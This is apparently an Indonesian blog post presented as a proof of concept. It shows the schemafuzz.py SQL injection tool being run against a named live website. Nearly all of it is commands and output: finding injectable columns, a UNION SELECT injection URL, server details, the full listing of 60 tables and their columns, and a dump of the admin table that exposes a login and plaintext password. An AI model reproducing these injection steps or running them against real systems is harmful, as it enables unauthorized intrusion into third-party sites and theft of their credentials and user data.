[POC] Schemafuzz.py
Software:
- OS Windos
- Browser mozilla
- Python 2.5 (download disini)
- Schemafuzz.py (download disini)
Target : http://justclone.com/alibabaclone/category.php?IndustryID=44
POC:
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
C:\Python25>schemafuzz.py --findcol -u http://justclone.com/alibabaclone/category.php?IndustryID=44--
[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44--
[+] Evasion Used: "+" "--"
[+] 13:31:32
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,
[+] Column Length is: 2
[+] Found null column at column #: 1
[+] SQLi URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,1--
[+] darkc0de URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de
[-] Done!
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
C:\Python25>schemafuzz.py --dbs -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de
[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:34:31
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] justclo_alibaba
[-] [13:34:35]
[-] Total URL Requests 3
[-] Done
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
C:\Python25>schemafuzz.py --schema -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba
[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:37:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing Tables & Columns from database "justclo_alibaba"
[+] Number of Tables: 60
[Database]: justclo_alibaba
[Table: Columns]
[0]admin:
LoginID,Password,AdminEmail,AdminEmailPassword,smtp,ScriptName,url,smtpstatus,port,Title,nochex,twoco,paypal,goldmemberfee
[1]all_leads: AllLeadsID,LeadID,LeadType,leadstatus,LeadAddedDate
[2]buyer: BuyerID,Password,BusinessEmail,FirstName,LastName,Sex,IndustryID,StreetAddress,StreetAddress2,StreetAddress3,City,Province,Country,Zip_PostelCode,Phone,Mobile,Active,ConfirmationCode,GoldMember,GoldMemberDate,Fax,Website,featured
[3]buyer_blogs: BuyerBlogID,BlogTitle,BlogStatus,Blog,BuyerID,BlogAddedDate
[4]buyer_leads:
BuyerLeadID,BuyerID,Subject,ProductKeyword,MoreKeywords,CategoryID,Details,Quantity,Packaging,ValidDates,PurchaseType,ProductPhoto,thumb1,thumb2,AddedDate,ExpiryDate,ExpireAfter,buyingleadstatus
[5]buyer_messages:
BuyerMessageID,SenderID,SenderType,RecieverID,ReadStatus,Subject,Message,CompanyName,ContactName,StreetAddress,StreetAddress2,StreetAddress3,Phone,Email,Fax,Website,MessageDate
[6]buyer_profile:
BuyerProfileID,BuyerID,CompanyName,CompanyLogo,CompanyLogo2,BusinessType,JobTitle,NumOfEmployees,LegalRepresentative,AnnualSalesRange,YearEstablished,Certifications,CompanyIntroduction,KeyProducts,AboutUs,AboutUsImage,bigbuyer,DateAdded
[7]buyer_video: BuyerVideoID,BuyerID,video,AddedDate
[8]buyercomments: CommentID,Comment,BuyerID,Rating,CommentBy,Status,AddedDate
[9]categories: CategoryID,IndustryID,Category
[10]contactus: contactus,note
[11]countries: CountryID,Country
[12]countries_show: CountryShowID,Country,Logo,LogoThumb,AddedDate
[13]industry: IndustryID,Industry
[14]news: NewsID,Title,Details,AddedDate,hot
[15]newsletter_subscribers: id,email,ConfirmationCode,status,AddedDate
[16]partner_sites: PartnerSiteID,logo,url,AddedDate
[17]phpbb_auth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[18]phpbb_banlist: ban_id,ban_userid,ban_ip,ban_email
[19]phpbb_categories: cat_id,cat_title,cat_order
[20]phpbb_config: config_name,config_value
[21]phpbb_confirm: confirm_id,session_id,code
[22]phpbb_disallow: disallow_id,disallow_username
[23]phpbb_forum_prune: prune_id,forum_id,prune_days,prune_freq
[24]phpbb_forums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[25]phpbb_groups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[26]phpbb_posts:
post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[27]phpbb_posts_text: post_id,bbcode_uid,post_subject,post_text
[28]phpbb_privmsgs:
privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[29]phpbb_privmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[30]phpbb_ranks: rank_id,rank_title,rank_min,rank_special,rank_image
[31]phpbb_search_results: search_id,session_id,search_time,search_array
[32]phpbb_search_wordlist: word_text,word_id,word_common
[33]phpbb_search_wordmatch: post_id,word_id,title_match
[34]phpbb_sessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[35]phpbb_sessions_keys: key_id,user_id,last_ip,last_login
[36]phpbb_smilies: smilies_id,code,smile_url,emoticon
[37]phpbb_themes:
themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[38]phpbb_themes_name:
themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[39]phpbb_topics:
topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_first_post_id,topic_last_post_id,topic_moved_id
[40]phpbb_topics_watch: topic_id,user_id,notify_status
[41]phpbb_user_group: group_id,user_id,user_pending
[42]phpbb_users:
user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_login_tries,user_last_login_try,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
[43]phpbb_vote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[44]phpbb_vote_results: vote_id,vote_option_id,vote_option_text,vote_result
[45]phpbb_vote_voters: vote_id,vote_user_id,vote_user_ip
[46]phpbb_words: word_id,word,replacement
[47]products:
ProductID,SellerID,ProductPhoto,ProductPhoto2,ProductPhoto3,ProductPhoto4,thumb1,thumb2,thumb3,thumb1_2,thumb1_3,thumb1_4,thumb2_2,thumb2_3,thumb2_4,thumb3_2,thumb3_3,thumb3_4,ProductName,ModelNo,ProductKeyword,CategoryID,ProductDescription,PlaceOfOrigin,BrandName,PriceTerms,Price,Packing,PaymentTerms,DeliveryTime,MinimumOrders,SupplyAbility,QualityCertification,AddedDate,productstatus,viewcounter,featured
[48]rightbanners: id,CategoryID,Banner,page,link,BannerNumber,AddedDate
[49]seller:
SellerID,Password,BusinessEmail,FirstName,LastName,Sex,IndustryID,StreetAddress,StreetAddress2,StreetAddress3,City,Province,Country,Zip_PostelCode,Phone,Mobile,Active,ConfirmationCode,GoldMember,GoldMemberDate,Fax,Website,MemberSince,Gold,featured
[50]seller_blogs: SellerBlogID,BlogTitle,BlogStatus,Blog,SellerID,BlogAddedDate
[51]seller_categories: SellerCategoryID,SellerID,CategoryID
[52]seller_messages:
SellerMessageID,SenderID,SenderType,RecieverID,ReadStatus,Subject,Message,CompanyName,ContactName,StreetAddress,StreetAddress2,StreetAddress3,Phone,Email,Fax,Website,MessageDate
[53]seller_profile:
SellerProfileID,SellerID,CompanyName,CompanyLogo,CompanyLogo2,BusinessType,JobTitle,NumOfEmployees,LegalRepresentative,AnnualSalesRange,YearEstablished,Certifications,CompanyIntroduction,KeyProducts,AboutUs,AboutUsImage,DateAdded
[54]seller_video: SellerVideoID,SellerID,video,AddedDate
[55]sellercomments: CommentID,Comment,SellerID,Rating,CommentBy,Status,AddedDate
[56]selling_leads:
SellingLeadID,Subject,ProductPhoto,thumb1,thumb2,BriefDescription,DetailedDescription,Keyword,CategoryID,SellerID,AddedDate,ExpiryDate,ExpireAfter,sellingleadstatus,featured
[57]success_stories: SuccessStoryID,Title,Name,Thumb,Details,AddedDate
[58]topbanners: id,SubCategoryID,Banner,page,link,CategoryID,AddedDate
[59]trade_shows: TradeShowID,Name,Logo,LogoThumb,StartDate,EndDate,Address,OpenTime,url,AddedDate
[-] [13:49:10]
[-] Total URL Requests 580
[-] Done
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
C:\Python25>schemafuzz.py --dump -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba -T admin -C LoginID,Password
[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:03:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Dumping data from database "justclo_alibaba" Table "admin"
[+] Column(s) ['LoginID', 'Password']
[+] Number of Rows: 1
[0] admin:admin123:admin123:
[-] [14:03:15]
[-] Total URL Requests 3
[-] Done
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar